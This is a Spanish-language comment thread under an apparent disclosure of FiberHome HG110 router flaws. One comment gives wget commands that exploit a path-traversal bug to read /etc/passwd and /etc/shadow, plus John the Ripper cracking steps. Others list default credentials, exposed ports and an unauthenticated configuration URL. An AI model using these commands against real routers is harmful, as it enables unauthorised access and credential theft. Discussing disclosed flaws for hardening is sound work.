good point ^^
Por: club penguin cheats
Por: infernal
como se llaman los cables que parecen coaxial de las antenas
y como es su configuración del hadware
Por: Zerial
Se refieres al pigtail ?
Por: r4c3
muy interesante informacion y hay mas router que tienen pifias pero estas pifias surgen donde el firmware es modificado por movistar chile para dejarnos las conexiones como las weas xD
Por: leonciokof
¿Como accedo via ssh?, ¿con que usuario y contraseña?, ¿son las mismas cuentas del acceso web?
Yo tengo acceso via web al router, me gustaría saber como lo hago para la conexión ssh.
Gracias.
Por: Zerial
Hola leonciokof: En mi caso el acceso ssh era usando las mismas credenciales que via web (la de admin)
Por: Claudio
Por defecto viene el puerto 443 (https) abierto para el exterior… uno puede desde afuera acceder a la configuración básica (donde se elige la clave wifi) sin necesidad de estar conectado a la red. Lo detecté con ShieldsUp! Mi solución fue hacer forward del puerto 443 al puerto 8765 (ese puse en mi caso) a la ip 192.168.1.1, usando la dirección (que tampoco requiere login) http://router_ip:port/cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=portforwd
Por: Claudio
Encontré además que se puede acceder al puerto 8000 desde afuera :S, hay que hacer forward también a ese puerto.
Por: AT-HE (atesin)
para obtener la contraseña de root podrian usar la misma vulnerabilidad encontrada por zerial para luego crackearlas con john the ripper como dijeron mas arriba desde otra maquina (offline cracking)
# obtienen el archivo passwd y el archivo shadow
wget “http://192.168.1.1:8000/cgi-bin
/webproc?getpage=../../../../../../../../../../../../etc/passwd&
var:menu=advanced&var:page=dns”
wget “http://192.168.1.1:8000/cgi-bin
/webproc?getpage=../../../../../../../../../../../../etc/shadow&
var:menu=advanced&var:page=dns”
# instalan el john the ripper, luego “juntan” los dos archivos
unshadow passwd shadow > fiberhome.pwd
# luego tratan de crackear este nuevo archivo por fuerza bruta, les recomiendo hacerlo en alguna maquina potente si tienen acceso
john -incremental:lanman fiberhome.pwd
Por: Joao Paulo
Someone could decrypt the root password?
Por: Zerial
hi Joao Paulo:
You can use a brute-force script to crack the shadow. Is not the same password at all.
cheers
Por: Vulnerabilidades en FiberHome HG110 e implicancias para Movistar | SPECT Research
[...] , en abril de 2011, difundió vulnerabilidades del tipo Local File Include y Cross Site Scripting en el router [...]
Por: Ivan
Hoy iba caminando y me encontre ese mismo router botado en la calle xd y taba bueno… xd
Por: jonathan
hola disculpen , alguno sabe cual es la contraseña admin del modem router?
saludos
Por: Digital_freeak
admin:1234
Por: dante
hola! Alguien sabe como cambiar el password del servicio SSH? para que no sea root root. Necesito el acceso SSH pero es bastante vulnerable. Ademas existe alguna forma de reiniciar el equipo usando SSH?. gracias.
Por: Andrés
Este router tiene alguna vulnerabilidad si lo uso solo como repetidor de wifi?